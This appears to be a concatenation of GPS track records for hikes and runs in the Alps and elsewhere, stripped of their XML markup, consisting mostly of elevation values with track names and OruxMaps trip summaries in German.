-79m</p><p>Steigzeit: 01:35</p><p>Sinkzeit: 00:13</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + + + + + + +850.8 + + + +838.95 + + + +854.68 + + + +856.27 + + + +860.62 + + + +876.79 + + + +915.73 + + + +914.52 + + + +920.37 + + + +923.74 + + + +933.69 + + + +953.65 + + + +958.14 + + + +969.19 + + + +973.12 + + + +1006.08 + + + +1049.87 + + + +1058.25 + + + +1077.15 + + + +1103.99 + + + +1121.25 + + + +1146.31 + + + +1166.41 + + + +1164.72 + + + +1176.93 + + + +1203.36 + + + +1210.37 + + + +1213.24 + + + +1250.28 + + + +1278.25 + + + +1295.09 + + + +1306.1 + + + +1329.21 + + + +1336.3 + + + +1342.88 + + + +1337.61 + + + +1366.24 + + + +1399.2 + + + +1400.74 + + + +1395.26 + + + +1422.27 + +" +" + + + + + + + +Linie +Erfassung über BayernAtlas + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-05-12 16:59:48 + + + + + + +1025.35 + + + +1025.7 + + + +1032.93 + + + +1067.16 + + + +1099.72 + + + +1117.98 + + + +1142.17 + + + +1164.5 + + + +1184.84 + + + +1189.09 + + + +1194.59 + + + +1210.86 + + + +1232.12 + + + +1250.59 + + + +1267.0 + + + +1291.5 + + + +1321.33 + + + +1342.46 + + + +1360.95 + + + +1409.14 + + + +1482.24 + + + +1503.09 + + + +1531.03 + + + +1564.77 + + + +1588.49 + + + +1609.05 + + + +1641.1 + + + +1683.09 + + + +1718.26 + + + +1765.6 + + + +1837.34 + + + +1722.42 + + + +1721.97 + + + +1680.98 + + + +1655.46 + + + +1640.27 + + + +1604.9 + + + +1590.33 + + + +1525.41 + + + +1491.68 + + + +1536.36 + + + +1493.71 + + + +1483.51 + + + +1415.99 + + + +1393.72 + + + +1336.82 + + + +1318.87 + + + +1277.85 + + + +1259.96 + + + +1237.39 + + + +1215.11 + + + +1198.6 + + + +1195.59 + + + +1152.3 + + + +1121.04 + + + +1037.12 + + + +1034.37 + + + +1034.99 + +" +" + + + + + + +Garmin International + + + +2014-08-14 14:01:22 + + + + + + +89.06 + + + +88.1 + + + +98.67 + + + +129.43 + + + +157.31 + + + +167.41 + + + +194.32 + + + +205.86 + + + +232.78 + + + +236.62 + + + +258.73 + + + +269.79 + + + +291.42 + + + +304.88 + + + +326.5 + + + +333.23 + + + +344.77 + + + +362.07 + + + +370.24 + + + +385.63 + + + +404.85 + + + +427.92 + + + +463.97 + + + +494.26 + + + +515.88 + + + +532.71 + + + +552.41 + + + +550.97 + + + +550.01 + + + +554.34 + + + +561.07 + + + +562.99 + + + +561.07 + + + +548.09 + + + +551.45 + + + +526.46 + + + +506.75 + + + +492.81 + + + +475.99 + + + +471.18 + + + +447.63 + + + +428.4 + + + +414.95 + + + +410.14 + + + +384.66 + + + +371.69 + + + +345.73 + + + +317.37 + + + +305.84 + + + +291.9 + + + +260.65 + + + +223.64 + + + +202.49 + + + +187.59 + + + +160.68 + + + +149.14 + + + +145.3 + + + +140.97 + + + +139.53 + + + +89.54 + + + +83.77 + + + +83.77 + +" +" + + + + + + +Garmin International + + + +Tarrekaisestugan bis Fußgängerbrücke 001 + + + + + + +522.49609375 + + +518.359375 + + +532.59765625 + + +529.7890625 + + +513.7421875 + + +513.70703125 + + +523.26953125 + + +516.10546875 + + +516.66015625 + + +531.12890625 + + +532.15625 + + +549.64453125 + + +542.28515625 + + +514.36328125 + + +512.515625 + + +503.0859375 + + +497.203125 + + +500.7421875 + + +499.30078125 + + +497.765625 + + +498.06640625 + + +509.95703125 + + +553.96484375 + + +560.21484375 + + +562.55078125 + + +554.45703125 + + +528.08984375 + + +507.65234375 + + +485.9765625 + + +473.8359375 + + +447.921875 + + +434.0390625 + + +443.9765625 + + +445.99609375 + + +433.2109375 + + +424.640625 + + +422.9140625 + + +420.06640625 + + +421.14453125 + + +421.0859375 + + +417.37890625 + + +422.046875 + + +418.34765625 + + +417.78125 + + +411.578125 + + +400.9296875 + + +399.34375 + + +391.47265625 + + +389.54296875 + + +387.41015625 + + +387.73046875 + + +387.98046875 + + +385.640625 + + +384.625 + + +379.38671875 + + +385.37109375 + + +375.41015625 + + +372.30859375 + + +361.0546875 + + +360.734375 + + +359.625 + + +359.359375 + + +357.703125 + + +352.34375 + + +346.7578125 + + +340.8359375 + + +339.7265625 + + +331.29296875 + + +325.37890625 + + +319.60546875 + + +317.94140625 + + +317.546875 + + +318.0234375 + + +321.6875 + + +325.05078125 + + +322.2421875 + + +319.921875 + + +317.34375 + + +315.9140625 + + +314.11328125 + + +313.12109375 + + +311.125 + + +309.32421875 + + +307.8515625 + + +307.5390625 + + +307.06640625 + + +307.0 +" +" + + + + + + + + + +809849208 on GPSies.com +809849208 on GPSies.com + + + +1148.0 + + + +1148.0 + + + +1171.0 + + + +1171.0 + + + +1171.0 + + + +1171.0 + + + +1170.0 + + + +1171.0 + + + +1166.0 + + + +1148.0 + + + +1147.0 + + + +1143.0 + + + +1123.0 + + + +1100.0 + + + +1077.0 + + + +1077.0 + + + +1085.0 + + + +1086.0 + + + +1090.0 + + + +1098.0 + + + +1100.0 + + + +1100.0 + + + +1100.0 + + + +1100.0 + + + +1100.0 + + + +1100.0 + + + +1122.0 + + + +1122.0 + + + +1140.0 + + + +1141.0 + + + +1140.0 + + + +1140.0 + + + +1145.0 + + + +1149.0 + + + +1155.0 + + + +1159.0 + + + +1158.0 + + + +1179.0 + + + +1179.0 + + + +1217.0 + + + +1208.0 + + + +1198.0 + + + +1190.0 + + + +1183.0 + + + +1151.0 + + + +1151.0 + + + +1154.0 + +" +" + + +Rotbachlspitze + + + + + +OruxMaps + + + +Rotbachlspitze +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rotbachlspitze</h2><br /><p>Startzeit: 09/10/2015 07:53</p><p>Zielzeit: 09/10/2015 11:08</p><p>Strecke: 4,6km (03:15)</p><p>Bewegungszeit: 01:39</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 5,3km/h</p><p>Minimale Höhe: 1772m</p><p>Maximale Höhe: 2893m</p><p>Steig-Geschw.: 353,5m/h</p><p>Sink-Geschw.: -151,9m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -9m</p><p>Steigzeit: 03:06</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1772.24 + + + +1773.31 + + + +1805.26 + + + +1790.99 + + + +1829.36 + + + +1853.75 + + + +1859.41 + + + +1876.74 + + + +1891.77 + + + +1936.24 + + + +1951.09 + + + +1969.04 + + + +1968.34 + + + +1984.21 + + + +2000.12 + + + +2029.24 + + + +2052.24 + + + +2057.03 + + + +2089.22 + + + +2119.12 + + + +2147.59 + + + +2166.37 + + + +2186.24 + + + +2194.97 + + + +2208.67 + + + +2214.24 + + + +2225.71 + + + +2245.12 + + + +2244.68 + + + +2256.25 + + + +2264.74 + + + +2275.86 + + + +2290.12 + + + +2313.24 + + + +2345.24 + + + +2346.75 + + + +2352.21 + + + +2376.24 + + + +2371.75 + + + +2377.21 + + + +2383.24 + + + +2395.75 + + + +2429.25 + + + +2451.72 + + + +2463.41 + + + +2467.37 + + + +2484.59 + + + +2489.74 + + + +2488.74 + + + +2511.61 + + + +2518.11 + + + +2532.83 + + + +2546.78 + + + +2567.98 + + + +2576.24 + + + +2587.25 + + + +2587.78 + + + +2587.6 + + + +2664.74 + + + +2713.73 + + + +2787.68 + + + +2874.23 + + + +2891.24 + + + +2893.37 + +" +" + + + + + + +Garmin International + + + +2014-05-18 10:15:57 Auto + + + + + + +1128.24 + + + +1091.71 + + + +1080.66 + + + +1056.63 + + + +1043.17 + + + +1042.69 + + + +1034.04 + + + +1027.79 + + + +1021.54 + + + +1010.96 + + + +994.62 + + + +996.06 + + + +996.06 + + + +994.14 + + + +995.1 + + + +995.1 + + + +994.14 + + + +997.51 + + + +1000.87 + + + +1002.79 + + + +1004.23 + + + +1006.16 + + + +1003.27 + + + +1001.35 + + + +992.22 + + + +996.06 + + + +991.26 + + + +991.26 + + + +991.26 + + + +991.26 + + + +989.33 + + + +991.74 + + + +990.3 + + + +994.62 + + + +995.58 + + + +996.06 + + + +993.66 + + + +988.85 + + + +990.3 + + + +991.74 + + + +993.18 + + + +996.06 + + + +998.95 + + + +998.95 + + + +1001.35 + + + +1005.68 + + + +1012.41 + + + +1021.54 + + + +1027.31 + + + +1027.79 + + + +1046.53 + + + +1055.18 + + + +1052.78 + +" +" + + + + + + +Garmin Connect + + +Vertical Sass de Fer + +running + + +204.0 + + + + + + +204.1999969482422 + + + + + + +212.0 + + + + + + +218.39999389648438 + + + + + + +224.0 + + + + + + +226.8000030517578 + + + + + + +223.60000610351562 + + + + + + +238.1999969482422 + + + + + + +245.39999389648438 + + + + + + +257.20001220703125 + + + + + + +264.0 + + + + + + +296.0 + + + + + + +321.3999938964844 + + + + + + +340.3999938964844 + + + + + + +376.6000061035156 + + + + + + +466.0 + + + + + + +532.4000244140625 + + + + + + +553.7999877929688 + + + + + + +597.5999755859375 + + + + + + +685.2000122070312 + + + + + + +694.0 + + + + + + +721.7999877929688 + + + + + + +747.2000122070312 + + + + + + +757.4000244140625 + + + + + + +828.0 + + + + + + +840.4000244140625 + + + + + + +839.7999877929688 + + + + + + +871.2000122070312 + + + + + + +890.7999877929688 + + + + + + +901.2000122070312 + + + + + + +920.5999755859375 + + + + + + +917.5999755859375 + + + + + + +927.2000122070312 + + + + + + +925.4000244140625 + + + + + + +952.5999755859375 + + + + + + +961.0 + + + + + + +977.2000122070312 + + + + + + +1002.4000244140625 + + + + + + +1014.2000122070312 + + + + + + +1036.5999755859375 + + + + + " +" + + + + + + + +Trentapassi1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-04-22 13:09:00 + + + + + + +458.84 + + + +459.87 + + + +471.72 + + + +507.68 + + + +529.14 + + + +537.96 + + + +584.51 + + + +598.49 + + + +607.56 + + + +614.13 + + + +626.27 + + + +633.0 + + + +675.9 + + + +698.91 + + + +702.18 + + + +707.04 + + + +723.63 + + + +738.67 + + + +751.58 + + + +759.43 + + + +790.74 + + + +803.94 + + + +827.01 + + + +838.12 + + + +843.24 + + + +857.43 + + + +864.38 + + + +876.81 + + + +885.33 + + + +891.36 + + + +894.3 + + + +921.38 + + + +945.16 + + + +955.02 + + + +969.54 + + + +977.09 + + + +1019.19 + + + +1085.4 + + + +1129.8 + + + +1149.07 + + + +1161.11 + + + +1174.36 + + + +1172.88 + + + +1153.02 + + + +1141.06 + + + +1162.4 + + + +1175.51 + + + +1196.4 + + + +1215.45 + + + +1226.17 + + + +1254.92 + + + +1293.69 + + + +1321.43 + + + +1390.25 + + + +1430.08 + + + +1460.3 + + + +1477.14 + + + +1522.1 + + + +1559.5 + + + +1608.21 + + + +1622.86 + + + +1632.51 + + + +1641.22 + + + +1643.41 + + + +1660.73 + + + +1682.9 + + + +1696.35 + + + +1705.59 + + + +1723.06 + + + +1738.42 + + + +1766.98 + + + +1777.66 + + + +1781.68 + + + +1777.65 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +2015-08-17 Rif.Benevolo, Val di Rhemes + + + + + + + + +1834.78515625 + + + +1848.1640625 + + + +1841.87890625 + + + +1866.94140625 + + + +1883.0234375 + + + +1884.4921875 + + + +1908.56640625 + + + +1911.9453125 + + + +1919.87109375 + + + +1930.44140625 + + + +1943.23828125 + + + +1955.12890625 + + + +1962.51171875 + + + +2004.75 + + + +2035.82421875 + + + +2027.97265625 + + + +2033.7890625 + + + +2032.3515625 + + + +2028.66015625 + + + +2032.625 + + + +2037.80078125 + + + +2034.890625 + + + +2043.8046875 + + + +2035.35546875 + + + +2043.42578125 + + + +2049.64453125 + + + +2064.0546875 + + + +2067.015625 + + + +2085.8125 + + + +2094.65234375 + + + +2079.79296875 + + + +2095.96484375 + + + +2098.71484375 + + + +2119.76953125 + + + +2107.2265625 + + + +2120.2265625 + + + +2119.734375 + + + +2105.4375 + + + +2109.375 + + + +2122.9140625 + + + +2142.2578125 + + + +2122.09375 + + + +2125.078125 + + + +2129.98046875 + + + +2122.87890625 + + + +2112.51953125 + + + +2109.38671875 + + + +2120.30859375 + + + +2125.453125 + + + +2119.71484375 + + + +2128.33203125 + + + +2138.3125 + + + +2142.57421875 + + + +2167.07421875 + + + +2175.51953125 + + + +2186.11328125 + + + +2214.54296875 + + + +2236.5625 + + + +2250.36328125 + + + +2251.671875 + + + +2279.90234375 + + + +2290.44140625 + + + +2290.6953125 + + + +2289.36328125 + + + +2288.37109375 + +" +" + + + + + + + +Montana Corona + + + +372.42 + + + +374.958 + + + +371.233 + + + +370.064 + + + +369.809 + + + +369.558 + + + +372.551 + + + +375.967 + + + +385.0 + + + +390.209 + + + +391.893 + + + +397.286 + + + +403.255 + + + +407.643 + + + +411.89 + + + +415.843 + + + +425.128 + + + +457.516 + + + +472.132 + + + +475.655 + + + +464.3 + + + +420.79 + + + +430.379 + + + +423.594 + + + +411.007 + + + +412.102 + + + +399.291 + + + +392.113 + + + +396.0 + + + +385.9 + + + +374.176 + + + +370.174 + + + +353.323 + + + +345.837 + + + +352.426 + + + +364.586 + + + +369.306 + + + +362.017 + + + +361.286 + + + +384.374 + + + +382.781 + + + +385.894 + + + +382.528 + + + +387.811 + + + +382.967 + + + +379.173 + + + +408.28 + + + +411.02 + + + +408.693 + + + +415.718 + + + +423.756 + + + +429.817 + + + +435.373 + + + +437.976 + + + +439.796 + + + +442.004 + + + +436.55 + + + +426.723 + + + +422.771 + + + +412.137 + + + +406.442 + + + +404.759 + + + +394.49 + + + +391.526 + + + +390.358 + + + +385.172 + + + +384.168 + + + +395.314 + + + +394.999 + + + +392.849 + + + +371.439 + + + +364.866 + + + +365.157 + + + +371.541 + + + +372.987 + + + +369.059 + + + +369.948 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +161129-mm-wand-6600m-170HM + + + + + + +354.8 + + +357.9 + + +362.2 + + +360.2 + + +360.2 + + +352.8 + + +351.8 + + +356.1 + + +359.3 + + +352.2 + + +352.7 + + +351.7 + + +350.2 + + +350.3 + + +344.5 + + +337.1 + + +327.1 + + +318.5 + + +307.9 + + +307.1 + + +315.9 + + +309.9 + + +318.7 + + +329.6 + + +340.2 + + +331.4 + + +326.5 + + +334.1 + + +320.6 + + +318.5 + + +319.8 + + +317.7 + + +319.1 + + +317.7 + + +319.8 + + +318.5 + + +320.6 + + +334.1 + + +326.5 + + +331.4 + + +340.2 + + +329.6 + + +318.7 + + +309.9 + + +315.9 + + +307.1 + + +307.9 + + +318.5 + + +327.1 + + +337.1 + + +344.5 + + +350.3 + + +350.2 + + +351.7 + + +352.7 + + +352.2 + + +359.3 + + +356.1 + + +351.8 + + +352.8 + + +360.2 + + +360.2 + + +362.2 + + +357.9 + + +354.8 +" +" + + + + + + +Garmin International + + +2015-06-02 21:16:39 + + + + + + +1143.73 + + + +1151.49 + + + +1163.34 + + + +1175.27 + + + +1185.56 + + + +1216.14 + + + +1229.16 + + + +1264.15 + + + +1310.57 + + + +1344.29 + + + +1371.54 + + + +1399.19 + + + +1411.03 + + + +1437.16 + + + +1470.11 + + + +1494.92 + + + +1549.67 + + + +1600.4 + + + +1627.88 + + + +1638.99 + + + +1649.94 + + + +1667.83 + + + +1689.25 + + + +1708.41 + + + +1737.52 + + + +1758.9 + + + +1765.96 + + + +1791.28 + + + +1810.1 + + + +1794.68 + + + +1771.56 + + + +1780.33 + + + +1805.01 + + + +1813.85 + + + +1824.08 + + + +1825.56 + + + +1861.18 + + + +1882.1 + + + +1913.63 + + + +1948.67 + + + +1967.98 + + + +2015.16 + + + +2038.85 + + + +2025.32 + + + +1970.93 + + + +1944.24 + + + +1901.48 + + + +1839.93 + + + +1805.41 + + + +1772.56 + + + +1706.58 + + + +1656.37 + + + +1639.15 + + + +1628.84 + + + +1601.28 + + + +1546.68 + + + +1489.71 + + + +1427.33 + + + +1398.4 + + + +1361.5 + + + +1332.59 + + + +1265.27 + + + +1214.36 + + + +1200.14 + + + +1186.28 + + + +1173.85 + + + +1162.7 + + + +1150.84 + + + +1140.74 + + + +1136.34 + +" +" + + + + + + +Garmin International + + + +2015-12-04 14:09:52 + + + + + + +1176.79 + + + +1211.4 + + + +1236.87 + + + +1253.7 + + + +1270.04 + + + +1273.4 + + + +1284.94 + + + +1342.14 + + + +1365.69 + + + +1380.59 + + + +1393.57 + + + +1400.78 + + + +1416.16 + + + +1421.93 + + + +1428.66 + + + +1432.98 + + + +1448.84 + + + +1458.94 + + + +1579.1 + + + +1610.35 + + + +1635.34 + + + +1662.26 + + + +1692.06 + + + +1708.88 + + + +1712.73 + + + +1718.97 + + + +1712.25 + + + +1708.88 + + + +1690.62 + + + +1671.87 + + + +1668.51 + + + +1662.26 + + + +1662.26 + + + +1631.98 + + + +1623.32 + + + +1614.67 + + + +1614.67 + + + +1596.41 + + + +1565.16 + + + +1555.07 + + + +1548.82 + + + +1525.27 + + + +1489.7 + + + +1477.2 + + + +1470.47 + + + +1454.13 + + + +1448.84 + + + +1430.1 + + + +1419.04 + + + +1408.47 + + + +1388.28 + + + +1345.98 + + + +1319.07 + + + +1271.96 + + + +1258.5 + + + +1245.53 + + + +1230.62 + + + +1212.36 + + + +1202.27 + + + +1178.71 + + + +1167.18 + + + +1157.56 + + + +1129.69 + + + +1112.86 + + + +1102.77 + + + +1097.48 + +" +" + + + + + + +Garmin International + + +2015-06-30 09:48:13 + + + + + + +894.53 + + + +921.75 + + + +951.44 + + + +973.67 + + + +1026.04 + + + +1043.78 + + + +1051.16 + + + +1074.25 + + + +1093.73 + + + +1137.27 + + + +1174.16 + + + +1180.01 + + + +1198.21 + + + +1225.71 + + + +1247.17 + + + +1370.07 + + + +1399.61 + + + +1416.16 + + + +1442.96 + +" +" + + + + + + +Garmin International + + +2014-08-25 15:43:00 + + + + + + +1072.72 + + + +1060.89 + + + +1051.25 + + + +1042.18 + + + +1029.0 + + + +1029.54 + + + +1029.74 + + + +1026.93 + + + +1025.05 + + + +1030.78 + + + +1072.33 + + + +1077.55 + + + +1082.04 + + + +1085.85 + + + +1089.9 + + + +1097.36 + + + +1110.58 + + + +1132.36 + + + +1147.36 + + + +1154.76 + + + +1155.63 + + + +1167.34 + + + +1176.95 + + + +1231.32 + + + +1243.24 + + + +1255.37 + + + +1282.28 + + + +1299.78 + + + +1321.82 + + + +1329.98 + + + +1328.31 + + + +1321.58 + + + +1320.91 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +2017-03-10 15:56:38 + + + + + + +732.66 + + + +731.22 + + + +731.7 + + + +733.14 + + + +736.03 + + + +741.31 + + + +742.28 + + + +749.97 + + + +754.77 + + + +757.18 + + + +762.46 + + + +761.5 + + + +759.1 + + + +759.58 + + + +757.66 + + + +751.41 + + + +741.31 + + + +730.26 + + + +721.13 + + + +719.2 + + + +718.24 + + + +713.44 + + + +708.63 + + + +699.5 + + + +689.88 + + + +679.31 + + + +673.06 + + + +680.27 + + + +682.19 + + + +682.19 + + + +682.19 + + + +682.67 + + + +682.67 + + + +682.67 + + + +679.79 + + + +685.56 + + + +687.96 + + + +698.05 + + + +700.94 + + + +709.11 + + + +715.36 + + + +721.61 + + + +727.37 + + + +745.64 + + + +725.45 + + + +721.61 + + + +721.61 + +" +" + + +Belchen- Gwidemflue mit Priska + + + + + + + + + +853.1 + + +853.4999965048013 + + +870.1999750969404 + + +885.5000071773612 + + +892.1999695128795 + + +896.5 + + +901.9999179407597 + + +944.70009898309 + + +954.2000251372474 + + +959.2999902147641 + + +971.7999771691403 + + +976.699998380738 + + +972.6000157846543 + + +974.2000004684518 + + +970.3999736768285 + + +981.1999668153021 + + +987.7999754915759 + + +992.0999908533182 + + +1001.1999884882297 + + +960.7 + + +997.0000319783877 + + +1026.8 + + +1032.4998832140318 + + +1045.8999861043926 + + +1055.4999688944877 + + +1062.0999001009627 + + +1068.7 + + +1080.5242306641198 + + +1092.2 + + +1085.299851659742 + + +1077.8000648063826 + + +1075.9001101788806 + + +1068.7 + + +1062.099900100946 + + +1055.4999688946534 + + +1045.8999861044235 + + +1032.499883215421 + + +1026.8 + + +1013.3001259612223 + + +1003.8998843298413 + + +1024.2000040511687 + + +1030.8001463896467 + + +1056.9 + + +1063.8001447066024 + + +1058.4935429939226 + + +1055.721615596222 + + +1052.3352575394892 + + +1053.5999672584437 + + +1009.7999861718554 + + +984.8 + + +981.1999668153021 + + +970.3999736768285 + + +974.2000004684518 + + +972.6000157846543 + + +976.699998380738 + + +971.7999771691403 + + +959.2999902147641 + + +954.2000251370904 + + +944.70009898309 + + +901.9999179407597 + + +896.5 + + +892.1999695128548 + + +885.5000071773612 + + +870.1999750969285 + + +854.5 + + +852.7 + + +852.8999984050186 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +pic St michel + + + + + +OruxMaps + + + +pic St michel +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic St michel</h2><br /><p>Startzeit: 05/05/2016 11:10</p><p>Zielzeit: 05/05/2016 12:40</p><p>Strecke: 4,8km (01:29)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4km/h</p><p>Max. Geschwindigkeit: 9km/h</p><p>Minimale Höhe: 1214m</p><p>Maximale Höhe: 1959m</p><p>Steig-Geschw.: 560,2m/h</p><p>Sink-Geschw.: -298,5m/h</p><p>Aufstieg: 758m</p><p>Abstieg: -19m</p><p>Steigzeit: 01:21</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1214.63 + + + +1281.46 + + + +1267.92 + + + +1279.93 + + + +1289.94 + + + +1286.0 + + + +1295.42 + + + +1311.57 + + + +1319.82 + + + +1336.96 + + + +1365.05 + + + +1390.1 + + + +1429.8 + + + +1433.31 + + + +1439.64 + + + +1446.61 + + + +1436.08 + + + +1444.95 + + + +1445.79 + + + +1445.55 + + + +1445.9 + + + +1449.35 + + + +1453.7 + + + +1458.97 + + + +1471.42 + + + +1468.21 + + + +1471.46 + + + +1480.43 + + + +1486.05 + + + +1506.92 + + + +1508.54 + + + +1534.95 + + + +1536.57 + + + +1549.54 + + + +1559.15 + + + +1585.4 + + + +1588.48 + + + +1600.2 + + + +1606.49 + + + +1621.13 + + + +1647.07 + + + +1680.4 + + + +1675.57 + + + +1683.02 + + + +1696.47 + + + +1698.64 + + + +1705.69 + + + +1736.05 + + + +1748.01 + + + +1759.18 + + + +1842.04 + + + +1845.49 + + + +1867.55 + + + +1869.33 + + + +1903.54 + + + +1927.29 + + + +1926.63 + + + +1927.61 + + + +1951.02 + + + +1959.18 + +" +" + + + + + + +Garmin International + + + +Gantrisch + + + + + + +1517.097900390625 + + + +1516.6171875 + + + +1526.230224609375 + + + +1533.440185546875 + + + +1546.8984375 + + + +1556.992431640625 + + + +1569.48974609375 + + + +1611.306884765625 + + + +1627.649169921875 + + + +1643.510986328125 + + + +1656.969482421875 + + + +1684.847900390625 + + + +1695.42236328125 + + + +1703.11279296875 + + + +1724.74267578125 + + + +1730.02978515625 + + + +1744.93017578125 + + + +1753.58203125 + + + +1754.543212890625 + + + +1755.985107421875 + + + +1756.466064453125 + + + +1767.52099609375 + + + +1772.80859375 + + + +1787.22802734375 + + + +1790.5927734375 + + + +1803.570556640625 + + + +1812.703125 + + + +1815.587158203125 + + + +1813.664306640625 + + + +1812.703125 + + + +1812.222412109375 + + + +1815.1064453125 + + + +1813.664306640625 + + + +1819.912841796875 + + + +1874.708251953125 + + + +1877.592041015625 + + + +1881.91796875 + + + +1884.80224609375 + + + +1884.80224609375 + + + +1885.763427734375 + + + +1930.9453125 + + + +1947.28759765625 + + + +2004.486083984375 + + + +1982.8564453125 + + + +2000.640869140625 + + + +2027.0771484375 + + + +2096.292236328125 + + + +2131.86083984375 + + + +2152.04833984375 + +" +" + + +Tourenplanung am 18. März 2017 + +Holger Stein - Community + + + + + +Tourenplanung am 18. März 2017 + + + +49.9 + + +50.2 + + +53.2 + + +31.4 + + +9.0 + + +14.1 + + +4.9 +" +" + + +2015-05-01_12-02_ven.gpx + + + + + +venerdì 1 maggio 2015 + + + +339.66 + + +4.0 + + + +340.86 + + +3.0 + +344.36 + + +10.0 + +386.66 + + +10.0 + + + +396.96 + + +9.0 + +406.96 + + +3.0 + +434.16 + + +4.0 + + + +458.66 + + +10.0 + + + +511.06 + + +10.0 + + + +526.06 + + +10.0 + + + +560.36 + + +9.0 + +563.86 + + +9.0 + +573.16 + + +9.0 + +584.36 + + +9.0 + +604.26 + + +3.0 + +647.46 + + +9.0 + +670.76 + + +9.0 + +691.36 + + +4.0 + + + +709.86 + + +9.0 + +713.06 + + +4.0 + + + +741.66 + + +3.0 + + + +758.06 + + +4.0 + + + +765.46 + + +3.0 + +817.66 + + +3.0 + +828.56 + + +4.0 + +#fbaf00 +#1" +" + + + +Silvia Sigorini + + + + +Endomondo + + +http://www.endomondo.com/ + +endomondo +WALKING + + + + + +268.9 + + + +272.6 + + + +265.7 + + + +275.7 + + + +265.7 + + + +264.0 + + + +267.6 + + + +282.5 + + + +296.4 + + + +294.9 + + + +292.3 + + + +304.3 + + + +313.3 + + + +353.1 + + + +396.8 + + + +395.2 + + + +390.1 + + + +389.9 + + + +388.6 + + + +387.8 + + + +401.8 + + + +418.6 + + + +447.7 + + + +449.5 + + + +458.8 + + + +494.7 + + + + + + + + + + +498.0 + + + +484.2 + + + +476.8 + + + +490.7 + + + +500.5 + + + +501.5 + + + + + + + + + + +492.1 + + + +494.4 + + + +492.7 + + + +486.8 + + + +492.7 + + + +492.1 + + + +484.6 + + + +477.6 + + + +464.2 + + + +446.3 + + + +429.1 + + + +394.5 + + + +384.5 + + + +387.1 + + + +384.9 + + + +375.0 + + + +380.2 + + + +315.6 + + + +294.1 + + + +297.2 + + + +274.6 + + + +260.2 + + + +264.0 + + + +264.1 + + + +268.7 + + + +265.0 + + + +259.3 + + + +254.9 + + + +259.5 + + + +264.0 + + + +275.2 + + + + + + + + +" +" + + +2016-07-24T08:41:25+0200 + + +1460.0 + +1462.1305241679938 + +1464.9881208521253 + +1469.3001563241626 + +1477.95277546878 + +1482.7516451341346 + +1492.318162568008 + +1530.6523479096597 + +1536.7921476559031 + +1552.6956171611735 + +1575.751817173198 + +1583.862056123387 + +1593.997848860574 + +1608.1770994709582 + +1629.2077486678859 + +1646.6555034235512 + +1655.5407493406624 + +1682.4476969521672 + +1708.2232183166907 + +1723.362096943849 + +1720.4682751619855 + +1756.4482511902895 + +1762.6455775459526 + +1757.504377230836 + +1763.5267423434664 + +1760.8826840098757 + +1765.9032749561632 + +1789.8315333190296 + +1803.5598307464968 + +1815.2561394569846 + +1827.0862420515184 + +1849.3049905125429 + +1857.9705488273416 + +1867.4287220002923 + +1887.076148946134 + +1912.9837104494725 + +1921.4652760517638 + +1936.2508329401985 + +1963.5728260692542 + +2001.5445004399717 + +2042.0757673409987 + +2047.6819153983197 + +2059.929022827194 + +2070.2193482601215 + +2082.6395860175144 + +2121.628689699362 + +2140.7643682637145 + +2141.7977404710973 + +2161.3510392509606 + +2178.3930158357034 + +2196.682867070238 + +2217.1489615094556 + +2226.128938581397 + +2256.6970219396107 + +2305.1690883718384 + +2312.9398643401637 + +2315.93070436358 + +2327.861839273584 + +2343.6462821215728 + +2345.2035553326045 + +2350.9335501236087 + +2352.9647349888087 + +2359.337132051706 + +2388.3990929808188 + +2444.3675601514265 + +2456.4462188822745 + +2474.2586498870855 + +2483.303475262201 + +2522.436905888874 + +2532.8537955288875 + +2537.548224359725 + +2534.1900627481145 + +2525.068730364287 + +2511.136338678157 + +2496.1869778415085 + +2480.4485051575407 + +2456.8844196308405 + +2448.094663667162 + +2448.0102607831163" +" + + + + + + +Garmin Connect + + +Muottas Muragl + + + +1786.5999755859375 + + + +1789.800048828125 + + + +1814.800048828125 + + + +1843.5999755859375 + + + +1877.5999755859375 + + + +1893.4000244140625 + + + +1907.800048828125 + + + +1926.199951171875 + + + +1929.800048828125 + + + +1927.5999755859375 + + + +1951.199951171875 + + + +1952.4000244140625 + + + +1959.0 + + + +1969.5999755859375 + + + +1977.5999755859375 + + + +2041.4000244140625 + + + +2038.0 + + + +2057.199951171875 + + + +2072.0 + + + +2072.39990234375 + + + +2111.0 + + + +2122.39990234375 + + + +2191.800048828125 + + + +2168.60009765625 + + + +2165.199951171875 + + + +2212.39990234375 + + + +2191.39990234375 + + + +2209.39990234375 + + + +2212.800048828125 + + + +2229.800048828125 + + + +2260.39990234375 + + + +2268.199951171875 + + + +2289.39990234375 + + + +2313.60009765625 + + + +2341.39990234375 + + + +2354.800048828125 + + + +2387.39990234375 + 